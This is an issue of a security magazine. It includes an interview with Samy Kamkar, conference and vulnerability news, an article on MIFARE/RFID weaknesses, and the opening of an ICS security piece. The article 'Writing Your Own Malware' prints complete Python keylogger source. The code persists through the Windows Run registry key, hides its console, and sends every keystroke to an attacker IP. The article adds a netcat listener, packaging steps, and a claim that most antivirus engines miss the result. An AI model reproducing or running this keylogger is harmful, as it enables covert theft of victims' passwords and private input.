Vol.5 Issue 22 / 2015
Interview with
Samy Kamkar a privacy and security researcher
Journey to the wonders of ICS Security Security of Radio Frequency Identification (RFID) Tags www.bluekaizen.org
www.bluekaizen.org
Contents
Interviews 6 Samy Kamkar a privacy and security researcher
Grey Hat
10
Writing Your Own Malware
New & News
14 CSCAMP 2015
Security of Radio Frequency (RFID) Tags
20 Identification
17 Bluekaizen News
Journey to the wonders ICS Security
26 of
Malware Analysis
32
GVOL GUI app built in java for the purpose of malware analysis
Issue 22 | Securitykaizen Magazine | 4
Hardware Hacking
Reviews
35
CSXP Review
Editor Mohamed H.Abdel Akher Contributors BK team Ahmed Fouda Khaled Sakr May Medhat Mohamed Shawky Steevan Vikram
Those of you reading this magazine everywhere, Welcome!
Website Development Mariam Samy Marketing Coordinator Mahitab Ahmed Distribution Ahmed Mohamed Design
Medhat A.Albaky Security Kaizen is issued Bi-Monthly Reproduction in Whole or part without written permission is strictly prohibited ALL COPYRIGHTS ARE PRESERVED TO WWW.BLUEKAIZEN.ORG For Advertisement In Security Kaizen Magazine & www.bluekaizen.org Website E-mail info@bluekaizen.org Or Phone: +2 0100 267 5570 +971 5695 40127
Is unique in its ability to bring info sec professionals together at all levels of their careers. The theme of this magazine is about the Hardware Security. In Egypt and the ME, this field is quite rare compared with other tracks in information security profession.
www.bluekaizen.org
Chairman & Editor-in-Chief Moataz Salah
Editor’s Note
MagazineTeam
Hardware becomes the enforcer for secure systems because it is used to ensure that only the authenticated user and software can access the processor. However, current hardware design flow does not have security as a key design objective. So it’s important to prepare our devices to be built with security requirements in mind. We have a unique interview with Samy Kamkar, car hacker who was able to unlock nearly any car by his own device. We also featured some unique articles like ICS security, Radio Frequency Tags and writing your own malware in Python. You might have heard about Cyber Talents, The first Platform to assess and measure skills of cyber security professionals all over the world in a unique way which is online games and challenges, we started a crowd funding campaign on zoomal to raise 20000 USD. We hope that you can support us even by sharing the idea. And lastly, we’re honored to announce that Bluekaizen has signed an agreement with ISACA to be the first Partner in the ME, providing the cyber security Nexus (CSX) Training in March 2016. For further information, you would contact Training @bluekaizen.org
Mohamed H.Abdel Akher Editor of Security Kaizen Magazine Issue 22 | www.bluekaizen.org | 5
www.bluekaizen.org
Interviews
Interview with
Samy Kamkar
a privacy and security researcher
Can you please introduce yourself to security Kaizen magazine readers (bio, experience, history) I originally learned software development and have always been interested in hacking and security with a recent interest in hardware and radio frequency. I dropped out of high school and began working in technology early (around age of 15).
BK Team
WWW.Bluekaizen.org Issue 22 | Securitykaizen Magazine | 6
you’ve created a tool that named Evercookie.. can you please give us an overview about it ? Evercookie is an API that allows persistent tracking of a user in a browser even after they’ve removed cookies. I developed it to demonstrate the issues that are in browsers and have already been exploited by corporations and governments with little knowledge by users. By creating it as free and open source, it shed light on the issue and allowed browser vendors to produce more effective controls for privacy for users.
why did you get prohibited from using a computer for a 3 years ? In 2005 when I was 19 years old I released a worm onto MySpace, the number one site on the Internet at the time, that made a user add me as a friend and add the text “but most of all, samy is my hero” to their profile. The code would also copy to their profile, so if someone visisted their profile, they would also add me as a friend and hero. Within a day, over one million users added me, making it the fastest spreading virus of all time to date. MySpace had to shut down to remove the worm and in 6 months I was raided by the Secret Service, and 6 years later I was banned from computer for three years.
you’ve demonstrated weaknesses in Visa, MasterCard and Europay credit cards with Near field communication (NFC) and Radiofrequency identification (RFID) chips… what were your major findings ? The issue is that while there is encryption within the NFC cards, the chips that perform decryption are readily available to anyone with little cost (under $100 USD) for Point of Sale systems for merchants. The chips are necessary to decrypt the communication and transfer the credit card to gateway. Because anyone can purchase them, I was able to enhance existing software to decrypt additional credit cards and demonstrate stealing credit cards through a portable, wireless system.
Why did you create Samy Worm “ the most infectious computer worms in existence” ? This was a prank as a 19 year old and had no idea it would spread as quickly as it did!
How were you able to take control over GM Cars? why did you choose GM cars specifically ? While I’m a fan of the cars GM is creating and the quality they produce, it’s important to note they have recently been a proponent of preventing researchers such as myself investigate how the software works within their vehicles. They’ve requested that reverse engineering their software, similar to how I learned about the attack, should be illegal in the USA based off of the DMCA (http://www.wired.com/2015/04/dmca-ownership-john-deere/). I believe my demonstration is important to show that by preventing researchers such as myself from investigating security in their products, the only ones left to find the issues are malicious users. My demonstration allowed GM to fix the issues for more than three million users who use their RemoteLink app, according to their site (https:// www.onstar.com/us/en/services/remotelink.html), however if I’m prevented from researching these issues, the only ones who will do the research illegally are criminals who will likely exploit consumers afterwards.
Issue 22 | www.bluekaizen.org | 7
You revealed that you can attack BMW Remote, Mercedes-Benz mbrace, and Chrysler Uconnect. How is it possible ?
The same way GM/OnStar RemoteLink were exploited, by exploiting mobile devices to join networks they willingly share the name to, and by performing SSL man-in-the-middle attacks.
How did you hack any garage door Using a child’s toy from Mattel ? and how to protect ourselves against garage hacking ? Many garages use a very limited key space, similar to the number of possible passwords you can use to get into a website. In combination with another attack I discovered on how the garages interpret these passwords, I was able to reprogram a Mattel toy to wirelessly send every possible password for garages in under 10 seconds, opening many of these fixed code garages.
Is this possible in every modern car to be hacked? Every car I have tested, including models from 2015, have had vulnerabilities that I was able to exploit to, at the very least, unlock the vehicle after the user performed an unlock command from their own car remote.
What kinds of things do you do in your daily life to protect yourself? I use different passwords for each website, however many things are difficult to protect and I remain as vulnerable as anyone :)
Issue 22 | Securitykaizen Magazine | 8
As a Security Expert, How do you judge the WikiLeaks’ decision of publishing the full database of Hacking Team data?and How vulnerable Arab Governments after this kind of disclosure ? Do you fear that the diffusion of their softwares could be used by criminal groups? I believe the more important question is not wether criminals are using the information now, but if they were using it before the data was ever released. As soon as the data was leaked, many patches and resolutions to the issues were resolved -- this seems like a good thing for the world as a whole. How long were organizations using these vulnerabilities to exploit users before it became leaked...who knows? That’s what’s much scarier than the short period of time criminals were able to abuse the data post-leak.
Samy Kamkar Could you tell us more about the company that you have founded ? I cofounded a Voice over IP company, Fonality, which produces phone systems for businesses.
Do different governments including the US government ask for your help in certain Cyber Crime cases? Examples? Occasionally, however I can’t provide examples. I typically only work with companies I believe are producing a positive impact in the world.
How can you see the Future of Security industry in The Middle East ?
what is your advice for Governments, users and organization to stay secure ?
It will be similar to the rest of the world with new vulnerabilities and important to secure each machine.
Use strong passwords and encryption.
Issue 22 | www.bluekaizen.org | 9
www.bluekaizen.org
Grey Hat
Writing
Your Own Malware
1. Objective Hello All, First I would like to set our objectives and goals through this article, in this article we will have a small tutorial and example on how to write a malware using python, The target audience for this articles are the academic community who seeks to understand the working details of every thing and every tool they use, because at the end most tools are available online. However Learning the details is essential academically if you want to get improved and as we will see it’s not rocket science and some malware can consist of just simple lines of code.
Khaled Sakr
Information Security Engineer @ Security Meter Issue 22 | Securitykaizen Magazine | 10
2. Introduction I’m going to discuss the basic structure on how to write a malware, spyware or Trojans, We all know that there are many types of malwares including rootkits, ransom ware, key logger,... etc. In this article we will start our tutorial with a key logger spyware program that can infect a windows machine permanently without the end user knowledge. Writing a key logger requires only basic coding skills. The programming language I will be using is Python since it is very effective when it comes to such programs. 3. Program Structure Before demonstrating the code, I will be giving a brief explanation on the functioning of the script and the way it works. The script has four main functions: 1. AddProgramToStartUp(): This function modifies a registry key called HKEY_ CURRENT_USER\Sof tware\Microsof t\ Windows\CurrentVersion\Run. Entries in this registry determine which programs should run during the computer’s startup or user’s login; this is a way to make the malware working permanently. 2. HideCmd(): This function will hide any activity happening in the cmd so that the user does not suspect anything. 3. SendToRemoteServer(): This function opens a socket level connection to the attacking machine in the purpose of sending it the keystrokes. 4. GetKeyPressedAndSendIt(): This function receives the key pressed by the user and then sends it to the attacker using the function SendToRemoteServer(). Below is a little flowchart of the program Structure. HideCmd
No
AddProgramtoStartUp
SendToRemoteServer
Yes
4. Python Source Code #!/usr/bin/python ##PyHook and Pythoncom are responsible for getting keystrokes import pyHook, pythoncom ##socket will be used for channel creation between victim and the attacker import socket ##the next modules are used for windows functions like editing registry keys and hide cmd function import win32event, win32api, winerror,win32console,win32gui from _winreg import * def AddProgramToStartup(): ##Function Definition ##in python __file__ is an instant of the file path where it was executed so if the user excuted the file from the desktop t __file__ would be c:\ users\username\desktop fp=os.path.dirname(os.path.realpath(__file__)) ##next appending the filename “malware.py” file_name=”maleware.py” new_file_path=fp+”\\”+file_name ##KeyVal is a raw string variable containing registry key name. ##python raw strings used in case we have / in our strings keyVal= r’Software\Microsoft\Windows\ CurrentVersion\Run’ ##The next couple of codes is adding an entry in the registry key which will make our code run each time user logs in. key2change= OpenKey(HKEY_CURRENT_ USER,keyVal,0,KEY_ALL_ACCESS) SetValueEx(key2change, “HacKeD”,0,REG_SZ, new_file_path) ##Creating and initializing variable called data which will hold the keystrokes and HOST_IP which is the attacker’s IP data=’’ HOST_IP=”192.168.4.78” def SendToRemoteServer(): ##Function Definition global data ##Global variable which is the data to be sent #Create a TCP socket and connect to the attacker
KeyPresssed?
Issue 22 | www.bluekaizen.org | 11
machine on Port 500 ,These lines of code I believe most of python users aware of. sock=socket.socket(socket.AF_INET, socket. SOCK_STREAM) sock.connect((HOST_IP, 500)) sock.send(data) sock.close() return True def HideCmd(): ##Function Definition. window = win32console.GetConsoleWindow() ##Get a CMD win32gui.ShowWindow(window,0) ##Hide the CMD Shell(Putting the value 0) return True def GetKeyPressedAndSendIt(event): ##Function Definition global data ##Global variable data which will hold key strokes ##The next peace of the IF Statements are responsible for changing the ASCI value of the letters to characters. if event.Ascii==13: keys=’<ENTER>’ elif event.Ascii==8: keys=’<BACK SPACE>’ elif event.Ascii==9: keys=’<TAB>’ else: keys=chr(event.Ascii) ##if any letter is pressed get the character value of it’s Asci.
data=data+keys ##Put the key into the buffer HideCmd() ##Hide The CMD SendToRemoteServer() ##Send the Key logs to the remote server ##Now after defining all the functions it’s time for the main function which will be executed upon double clicking on the file. ##First it will call the AddProgramToStartUp () Function. AddProgramToStartup() ##Next the part is to get key strokes from the keyboard, This can be easily done done using pyhook and pythoncomp ##The below link explains how to get
Issue 22 | Securitykaizen Magazine | 12
mouse events and keyboard events using python(PyHook and Pythoncom Modules) ###############http://sourceforge. net/p/pyhook/wiki/PyHook_ Tutorial/################## hm = pyHook.HookManager() ##Call the function GetKeyPresseedAndSendIt() hm.KeyDown = GetKeyPressedAndSendIt() hm.HookKeyboard() pythoncom.PumpMessages()
• It is mandatory to have a listener which should be implemented at the attacker machine on port 500 to receive the key logs, and this can be easily implemented using the bash. #!/usr/bin/bash while true do nc -nlp 500 ##open a permanent listener on port 500 using nc done 5. Python2EXE As you can see, it is not complicated to write personal key loggers, and the same thing applies to som malwares. The challenge now is running the script we have written before in a machine, such as Windows, where Python is not installed. The solution to this problem is Pyinstaller which is used to convert a Python script into an executable file. You only need to download Pyinstaller and run the command Pyinstaller –onefile <script>.py on the cmd. This is a screenshot while running Pyinstaller, The output of the command will generate an exe file in the Pyinstaller directory.
6. Executable in action
After implementing both the key logger and the listener code, we will check if they are working. I am using my Linux Mint as the attacking machine and windows 7 as the Victim Machine. I first run the bash listener file using ./listener.sh. Next When the user executes the file: • First, an entry in the registry keys will be created • Then, the CMD will be hidden from the user • Finally, it will get the key log and send it to the attacker. Now, waiting for the victim to execute the file, from the code when the user hits the file it should create an entry in the registry keys, Hide CMD, Get Key logs and send it to the attacker, Now Let’s see these in action.
my Linux mint.\
7. VirusTotal Detection Ratio Since this is a personal code, I am going to check its detection ratio by antiviruses and antimalwares using virustotal.
1. Adding the program to the computer’s Start Up in /Software/Microsoft/Windows/ CurrentVersion/Run
2. Hiding the Cmd so that the user does not know anything about the programs’ functioning. It can also be a minor program which runs along with the keylogger after being executed. The process malware.exe is running and the cmd did not alert the user because it was hidden
Great! Our executable file can be detected by only two antiviruses (ClamAV,TheHacker), which means that we can bypass the most common used antiviruses like Kaspersky,AVE,Nod32. Therefore Knowing how to write a malware has also a bonus value despite digging in the details of how malware operates but also you will have a less chance of being detected by Antiviruses . Thanks For your time! To have a look at the source code, please visit my Github repository. https://github.com/HacKeD0x90/ PythonKeyLogger
3. The last step is receiving the keystrokes on
Issue 22 | www.bluekaizen.org | 13
www.bluekaizen.org
New & News
As many specialists in the security world know â&#x20AC;&#x201C; the Cairo Security Camp is one of the biggest security conferences in the Middle East and North Africa (MENA Region). This year it was once again held in Intercontinental City Stars. Every year the conference gets bigger and bigger, bringing in more and more people and companies from all over the world.
Cairo Security Camp was held this year on Septemper 19 and 20 and it brought the industry together for an exciting two days filled with discussions on latest threats and solutions to industry-wide issues. There top-notch talks spread across two tracks, ranging from in-depth analysis of technical topics to professional development and skill enhancement presentations. Issue 22 | Securitykaizen Magazine | 14
This year the conference included different discussion sessions covering different aspects of information security domain including CyberSecurity Skills crisis, Encryption, Malware analysis, Business Continuity, Mobile Security and A view on financial
cybercrimes in the Egyptian market from the ministry of interior
A set of the remarkable sessions in advanced topics and case studies were presented one of them was presented by Adel Abdelmoneim, ITU/RCC Cyber Security Expert, discussing ITU 5 pillars model to develop NCS strategy. In addition to demonstrating some of the important concepts such as IT-assets, Risk Management, Information Assurance , Business continuity and disaster recovery . presented by Major. Mostafa Khidr from Ministry of Interiorâ&#x20AC;?
After 5 years of holding CSCAMP, The Six version of CSCAMP2014 was a little bit different. This year we increased the activities to include Panel Discussion: Egypt Better Future: Search for the Young Talents , announcing new generation of courses named after CSX Cyber Security Nexus, Security awards and others, beside two conference rooms: one of them is only for workshops and the other for different security topics.
Another Advanced session was about Extreme logging which was covered by Osama kamal scaling out your logging infrastructure to handle huge volumes that traditional tools cannot handle anymore, showing best practice, tools, and designs, all based on real life experience. The workshop room in the first day also was present by Mr.Ahmed Riad who was with us on conference video and Mr.waleed Yasser as well. Both introduce the concept of Business continuity, implementation and OVERVIEW OF THE BCI GOOD PRACTICE GUIDELINES LIFECYCLE. The OWASP Cairo chapter was taking apart in the second day at the workshop room to present three main topics: Software Security Assurance, Mobile Application Security and Application Security Threat Modelling. Issue 22 | www.bluekaizen.org | 15
A new set of sessions was newly introduced during this year conference named after “Tech Talk “ and it was about having 5 minutes to share your thoughts with the community .
We also introduced a group of Egyptian Cyber Security Professionals who managed to be a part of a number of a prestigious leading security firms to have a great discussion panels named after : Egypt Better Future : Search for the Young Talents. The discussion was addressing the skills and education required to get hired in an international security company. What are their daily jobs and the challenges they face to get hired? What are their advices to the new generation of Cyber Security Professionals? Also, the discussion was producing ideas and suggestions to improve the Egyptian Cyber Security industry and how to use the most important asset in Egypt which is human capacity.
Next year, expect more of the same – high quality, engaging talks from up-and-coming security leaders. You should put CSCAMP on your must-see list of security conferences. Issue 22 | Securitykaizen Magazine | 16
www.bluekaizen.org
A peek under the hood to the recent security breaches
New & News
News
Two Critical Vulnerabilities found in TRUECRYPT Two critical security vulnerabilities have been discovered in the most famous encryption tool, TrueCrypt, that could expose the user’s data to hackers if exploited. James Forshaw, Security researcher with Google’s Project Zero — which looks for zero-day exploits — has found a pair of privilege elevation flaws in TrueCrypt package. Reportedly, TrueCrypt vulnerabilities would not directly allow an attacker to decrypt drive data. Instead, successful exploitation allows malware installation on the victim’s machine, which would be enough to figure out TrueCrypt’s Decryption Key and other sensitive data. 1- CVE-2015-7359 : The Windows driver used by projects derived from Truecrypt 7 (verified in Veracrypt and CipherShed) are vulnerable to a local elevation of privilege attack by checking process of impersonation token which allow a user to inspect and potentially manipulate other users mounted encrypted volumes on the same machine. https://code.google.com/p/google-security-research/issues/detail?id=537 2- CVE-2015-7358 : The Windows driver used by projects derived from Truecrypt 7 (verified in Veracrypt and CipherShed) are vulnerable to a local elevation of privilege attack by abusing the drive letter symbolic link creation facilities to remap the main system drive. With the system drive remapped it’s trivial to get a new process running under the local system account. https://code.google.com/p/google-security-research/issues/detail?id=538
BK Team
WWW.Bluekaizen.org Issue 22 21 | www.bluekaizen.org | 17
GCHQ’s SMURF ARMY can hack smartphones, says Snowden Smartphone users can do “very little” to stop security services getting “total control” over their devices, US whistleblower Edward Snowden has said. Snowden suggested spies could easily gain “total control” of smartphones by sending targets one simple text message. Once received, this allows spies to access a phone’s camera to secretly take pictures or listen using its microphone. Speaking from Moscow, Snowden told BBC Panorama that GCHQ and the NSA “want to own your phone instead of you”. He suggested British secret agents used a group of hacking tools called the “smurf suite” to get into their target’s smartphones.
“Dreamy Smurf is the power management tool which means turning your phone on and off with you knowing,” he said. “Nosey Smurf is the ‘hot mic’ tool. For example if it’s in your pocket, [GCHQ] can turn the microphone on and listen to everything that’s going on around you - even if your phone is switched off because they’ve got the other tools for turning it on. “Tracker Smurf is a geo-location tool which allows [GCHQ] to follow you with a greater precision than you would get from the typical triangulation of cellphone towers.” He also described a spy app called Paranoid Smurf. “It’s a self-protection tool that’s used to armour [GCHQ’s] manipulation of your phone,” he added. Snowden added the technology is provided by the United States National Security Agency (NSA), which provides “tasking and direction” to its UK counterpart and have spent $1 Billion on similar program itself in the US.
Issue 22 | Securitykaizen Magazine | 18
Hacking enterprise wireless Printers with a drone or a vacuum cleaner
A group of researchers from the itrust, a research center at the Singapore University of Technology and Design, has demonstrated how to use a Drone to intercept wireless printer transmissions from outside an office building. The drone carries a smartphone which runs two custom apps that are capable of intercepting wireless traffic of the printer which contain sensitive data. The researchers accessed a corporate network by using a smartphone-equipped drone to hack internal printers. In the demo provided by the researchers, they use a standard drone from the Chinese firm DJI and a Samsung smartphone. They developed two applications : • First App – once the open wireless printer is detected, establishes a bogus access point that mimics the printer and tricks computers in the internal wireless network to send sensitive documents to it. • Cybersecurity Patrol – To detect open WiFi printers and automatically notify the organisation’s IT department in order to mitigate this vulnerability The project’s aim is to aware businesses and organizations that their innocent looking printers and vacuum cleaners can be easily hacked and hijacked by hackers trying to get into their corporate networks. Refrence : http://itrust.sutd.edu.sg/research/projects/cyber-security-patrol/
WinRAR SFX v5.21 - Remote Code Execution Vulnerability According to Mohammad Reza Espargham, a security researcher at Vulnerability-Lab, the stable version of WinRAR 5.21 for Windows computers is vulnerable to Remote Code Execution (RCE) flaw. The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are able to generate own compressed archives with maliciuous payloads to execute system specific codes for compromise. The attackers saved in the sfx archive input the malicious generated html code. Thus results in a system specific code execution when a target user or system is processing to open the comprossed archive. Exploitation of the code execution vulnerability requires low user interaction (open file) without privilege system or restricted user accounts. http://seclists.org/fulldisclosure/2015/Sep/106 Issue 22 | www.bluekaizen.org | 19
www.bluekaizen.org
Hardware Hacking
Industrial Control Systems
Security of Radio Frequency Identification Steevan
(RFID) Tags
Information Security Engineer
Vikram
Senior Consultant at KPMG
Issue 22 | Securitykaizen Magazine | 20
The purpose of this article is to provide an insight to the explosive growth of wireless system using RFID that has led to the other side of concern which is securing the data on the fly. Although, RFID tags are reasonably secure, yet it can still be used against you surreptitiously. Many technical challenges remain in the present age of wireless networks, which we will be discussing in this article.
We have devices incorporated with RFID which can be used by an end user ranging from a parent monitoring baby`s movement remotely, to a government tracking weapons that are in transit. RFID is ubiquitous. Few of the fascinating uses are in casinos for robbery proof chips, loss resistant golf balls, amusement parks for no swipe ticket passes, in humans and animals with their identity data stored, incorporated on smart fitting dress rooms to access the product data and may to find similar alternatives and as anti-theft. Technology has paved way to vastly expand in the wireless space. Wireless communications over the years has taken a paradigm shift in terms of tremendous growth in communications industry. Now a days cellular phones have become a part of daily life for every individual which adds sophisticated features and technologies over the air. In addition to that wired networks are replaced with wireless sensor networks starting from Home broadband, to remote monitoring using technologies available.
“Every convenience comes at a cost” RFID Radio frequency identification is the use of wireless magnetic fields to transmit data, for automatically identifying and tracking tags attached to the objects. The tags contains information stored electronically. The RFID technology has generated much hype in the past few years, out of which the major driver for the development has been tagging physical objects, places & things with a radio chip so they can interface with computers. RFID technology is both hailed as the key to “internet Of Things (iOT)”, and condemned as invasive surveillance technology, and in more extreme circles it is feared as Mark of the beast [1]. As RFID is ubiquitous, our objective is to try to provide an insight on it. Although, RFID tags are reasonably secure. Yet it can still be used against you surreptitiously
Technical Overview The technical infrastructure part of RFID consists of a radio transponder and a receiver, also known as tag and a reader. Information is stored on a tag and is transmitted to a reader over a radio frequency (RF) connection. The reader in turn connects via a wireless/ wired networks to a server hosting the RFID application that makes use of the transmitted data, and in case of a supply chain applications, a middleware manages the RFID data flow between readers and enterprise application.
RFID Tags Tags contain a microchip and a transponder. The microchip stores data related to the object and the transponder transmits that data to readers. The data is written on the tag along with a unique identifier code at the point of manufacture (factory programming), but can also be programmed by an OEM or end user (field programming).Tags are either passive or active. Passive tags are smaller -- about the size of a grain of rice, and getting smaller. They are activated when they enter the range of a reader’s signal. The reader’s antenna sends power to the transponder, activating the data stream. Passive tags are much smaller in size and memory, than active tags and are cheaper to manufacture.
RF Connection Tags transmit data to readers over different radio frequencies, depending on the application needs. RF frequencies are dividing into several bands including low frequency (LF), high frequency (HF), ultra-high frequency (UHF), and microwave. Passive tags transmit at all frequencies while active tags transmit at higher frequencies only. The exact frequency that can be used within the various bands, as well as power (output) levels, are controlled by the regulatory body of each country. Each frequency varies in terms of regulation, performance, size and cost of the associated technology. Issue 22 | www.bluekaizen.org | 21
MIFARE RFID hacks
Algorithm used for encryption
One of the most common RFID Cards is the MIFARE Classic, produced by NXP Semiconductors The MIFARE Classic card family, which covers the public transport, access management, loyalty cards etc., are passive and fully compliant with ISO/IEC 14443 Type A. For cryptographic purposes, the MIFARE Classic cards use the CRYPTO1 cipher. This is a proprietary encryption algorithm, which was developed by NXP, based on the Hitag2 algorithm. CRYPTO1 is used in HITAG RFID systems and the details of the algorithm were kept secret by the manufacturer. The approach is called “Security through Obscurity”. Eventually, the hackers Nohl and Plötz from the Chaos Computer Club (CCC) in Berlin discovered the algorithm by reverse engineering.
From the re-engineering of the chip, it was known that the crypto logic had only one input and the UID was used as input as well as the key and those two had to be connected somehow, suspecting the connection method was XOR. To prove this theory, the first bit of the UID as well as the first bit of the key were flipped. If they were connected via XOR, this should still result in the same value. As confirmation for the team, the card responded again, which meant the theory via XOR connection was correct. With testing, they found out that the first five bit of the UID and the key are connected directly, which means the nth bit of the UID is connected to the nth bit of the key. For the other bits, the relationship is different. Another discovery made during testing the radio protocol was that the algorithm uses a pseudo random number generator (PRNG), which is realized with a linear feedback shift register (LFSR). Along general lines, a LFSR creates a sequence of numbers which appear random. It always starts with the same number and moves to the next number with the same frequency. Also, the nth number of one LFSR will always be the same. Challenged faced with using LFSR in passive RFID tags is, the cards relied on power supply from the reader. Inferring, every time the card is removed from the reader, it is out of power and the LFSR starts again with its initialization sequence as soon as it is provided again with energy, sending the same numbers in the same frequency as the last time. This was proved in an experiment of the CCC. They put the card next to the reader and switched on the reader. As a result, it always needs approximately the same time after the card is supplied with energy and starts creating random numbers, that the reader starts communicating. Within this experiment, they had the same random values of the LFSR in 12 out of 27 attempts.
The MIFARE Classic card 1k chip has 1k EEPROM memory, which is separated in 16 sectors with 4 blocks, each containing 16 byte making a total of 64 blocks and the 4k version offers 4k of EEPROM memory, separated in 256 blocks, where 32 sectors have 4 blocks and additional 8 sectors having 16 blocks. The first block contains the unique identification number (UID) of the card as well as some vendor specific data which is write protected. On the last block of each sector, access keys and access rules can be found, which does not intend to store user data. Before any memory operations are allowed on a sector, a reader has to authenticate itself for this sector. Hence, the sector trailer uses secret keys containing A and B which are used for the authentication. The access conditions located in the same block specifies memory operations allowed on the sector. The sector trailer itself has specific access conditions. The key A is never readable, key B can be configured readable or non-readable. If it is declared as readable, only key A can be used for authentication and key B is used to store data. There is also the single byte U, which has no defined purpose. The data blocks are used to store information for the application. For example, a cafeteria card could hold the name of the owner plus the current balance of the card.
MI FARE CLASSIC 4K REGISTER & BLOCKS STRUCTURE
Issue 22 | Securitykaizen Magazine | 22
With the work done by the CCC, it is possible to present the CRYPTO1 algorithm of the MIFARE Classic cards in detail. The algorithm consists of a LFSR and a function f(x). In the beginning, the shift register is initialized with the secret key. Afterwards, the PRNG creates 32 bit and XORs them with the UID. This string will then be shifted into the state of the shift register. The created random value is also used for the challenge response protocol between reader and card. At this point, the encryption is activated and all incoming and outgoing bits are XORed with the key stream. The shift register itself is only used for bits containing data or cyclic redundancy check (CRC) values. For encrypting parity bits, a bit of the key stream which was already used for a data bit is used again. Each cycle, the function f(x) computes one bit for the key stream out of 20 bits
it gets from the LFSR. The 18 taps of the LFSR are used to fill the first register bit on each shift. For this, the taps are connected linearly, implying the update function does not contain any non-linearity, which means that when one of the shift values is given, it is possible for an attacker to calculate previous values as well as upcoming values. With today’s knowledge of crypto systems, this can be considered a serious weakness.
Future examples of RFID usage in internet of things:
In future we can see each object in the real world will be tagged with RFID for monitoring, tracking and maintenance purposes. Below figure explains once such scenario:
traffic analysis, spoofing or denial of service attacks. We will look at each of these in turn:
Eavesdropping (or Skimming)
Security and Privacy issues with RFID: At this point of time we see all our sensitive information is being communicated over internet and is stored in different devices, all these devices and communication network and devices are using RFID’s. We can sense our data which is at risk, let see some of the security and privacy issues which must be considered to secure the data by both organizations and individual:
TAG DATA RFID tags are considered “dumb” devices, they can only listen and respond, no matter who sends the request signal. This brings up risks of unauthorized access and modification of tag data. In other words, unprotected tags may be vulnerable to eavesdropping,
Issue 22 | www.bluekaizen.org | 23
Radio signals transmitted from the tag, and the reader, can be detected several meters away by other radio receivers. It is possible therefore for an unauthorized user to gain access to the data contained in RFID tags if legitimate transmissions are not properly protected. Any person who has their own RFID reader may interrogate tags lacking adequate access controls, and eavesdrop on tag contents. Researchers in the US have demonstrated a skimming attack on an RFID credit card, through which credit card information, such as the cardholder’s name and account information, could be skimmed if not properly encrypted.
Traffic Analysis Even if tag data is protected, it is possible to use traffic analysis tools to track predictable tag responses over time. Correlating and analyzing the data could build a picture of movement, social interactions and financial transactions. Abuse of the traffic analysis would have a direct impact on privacy.
Spoofing
Denial of Service Attack The problems surrounding security and trust are greatly increased when large volumes of internal RFID data are shared among business partners. A denial of service attack on RFID infrastructure could happen if a large batch of tags has been corrupted. For example, an attacker can use the “kill” command, implemented in RFID tags, to make the tags permanently inoperative if they gain password access to the tags. In addition, an attacker could use an illegal high power radio frequency (RF) transmitter in an attempt to jam frequencies used by the RFID system, bringing the whole system to a halt.
RFID READER INTEGRITY In some cases, RFID readers are installed in locations without adequate physical protection. Unauthorized intruders may set up hidden readers of a similar nature nearby to gain access to the information being transmitted by the readers, or even compromise the readers themselves, thus affecting their integrity. Unauthorized readers may also compromise privacy by accessing tags without adequate access controls. As a result, information collected by readers and passed to the RFID application may have already been tampered with, changed or stolen by unauthorized persons. An RFID reader can also be a target for viruses. In 2006, researchers demonstrated that an RFID virus was possible. A proof-of-concept self-replicating RFID virus was written to demonstrate that a virus could use RFID tags to compromise backend RFID middleware systems via an SQL injection attack.
Based on the data collected from eavesdropping or traffic analysis, it is possible to perform tag spoofing. For instance, a software package known as “RFDump”, that runs on a notebook computer or personal digital assistant, allows a user to perform reading or writing tasks on most standard smart tags if they are not properly protected. The software permits intruders to overwrite existing RFID tag data with spoof data. By spoofing valid tags, the intruder could fool an RFID system, and change the identity of tags to gain an unauthorized or undetected advantage. One example is trying to save money by buying expensive goods that have had their RFID price tags spoofed to display cheaper prices. By combining the two capabilities of eavesdropping and spoofing, a replay attack is possible where an attacker can “query a tag, receive the information it sends, and retransmit this information at a later time”.
Issue 22 | Securitykaizen Magazine | 24
PERSONAL PRIVACY As RFID is increasingly being used in the retailing and manufacturing sectors, the widespread itemlevel RFID tagging of products such as clothing and electronics raises public concerns regarding personal privacy. People are concerned about how their data is being used, whether they are subject to more direct marketing, or whether they can be physically tracked by RFID chips. If personal identities can be linked to a unique RFID tag, individuals could be profiled and tracked without their knowledge or consent. For instance, washing clothes tagged with RFID does not remove the chips, since they are specially designed to withstand years of wear and tear. It is possible that everything an individual buys and owns is identified, numbered and tracked, even when the individual leaves the store, as far as products are embedded with RFID tags. RFID readers can detect the presence of these RFID tags wherever they are close enough to receive a signal.
Way to tackle the security risk in RFIDâ&#x20AC;&#x2122;s: Things in RFID which we have to address for security risks are:
1. Tag Data Protection 2. Reader Integrity 3. Personal Privacy Conclusion While the use of RFID technology is increasing across a range of different industries, the associated security and privacy issues need to be carefully addressed. Because RFID tags come in different flavors, there is no overall, generic RFID security solution. Some low-cost passive and basic tags cannot execute standard cryptographic operations like encryption, strong pseudorandom number generation, and hashing. Some tags cost more than basic RFID tags, and can perform symmetrickey cryptographic operations. Organizations wishing to use RFID technology need to therefore evaluate the cost and security implications as well as understand the limitations of different RFID technologies and solutions.
About the Authors
Steevan is a Certified Ethical Hacker with over 5 years of experience in software development and information security. He has extensive experience in security domain including penetration testing, application vulnerability assessments, Hardware security, web services security, Network vulnerability assessments, Android and BlackBerry mobile application testing. Vikram is a senior consultant in KPMG Global Services â&#x20AC;&#x201C; Cyber Security practice. He has close to 4 years of experience in enterprise application security, Hardware security and information security. He is one of the gadget lover and his passion resides in Mobile security.
References http://en.wikipedia.org/wiki/Radio-frequency_identification http://www.proxclone.com/ http://www.alientechnology.com http://www.rfidjournal.com/case-studies http://www.sos.cs.ru.nl/ http://www.iot-a.eu/public/public-documents/d6.4 http://www.rfidjournal.com/articles/view?1338 http://www.nytimes.com/2006/10/23/business/23card.html?pagewanted=1&_r=1
Issue 22 | www.bluekaizen.org | 25
www.bluekaizen.org
Hardware Hacking
Journey to the wonders of
ICS Security Introduction Industrial Control Systems play a vital role in our daily life. They control important aspects of different industries that cross our daily life in some way or another. Industrial Control Systems or ICSs control everything around you from small processes as in your car to nuclear reactors and aircraft systems. You can find ICSs in most utilities for example Oil & Gas, Smart Grid, Water treatment and so on.
Ahmed Fouda
Information Security Engineer at CONNECT-PS
Issue 22 | Securitykaizen Magazine | 26
Since we are security enthusiasts, when looking into these systems you can clearly see how vulnerable and fragile they could be. These systems are very obsolete and they were not secured by design so when they were connected to our IT network, they were massively attacked and torn down. And you can imagine how catastrophic it would be if someone attacked an ICS that controls prison security gates, electricity Smart Grid or even a nuclear reactor.
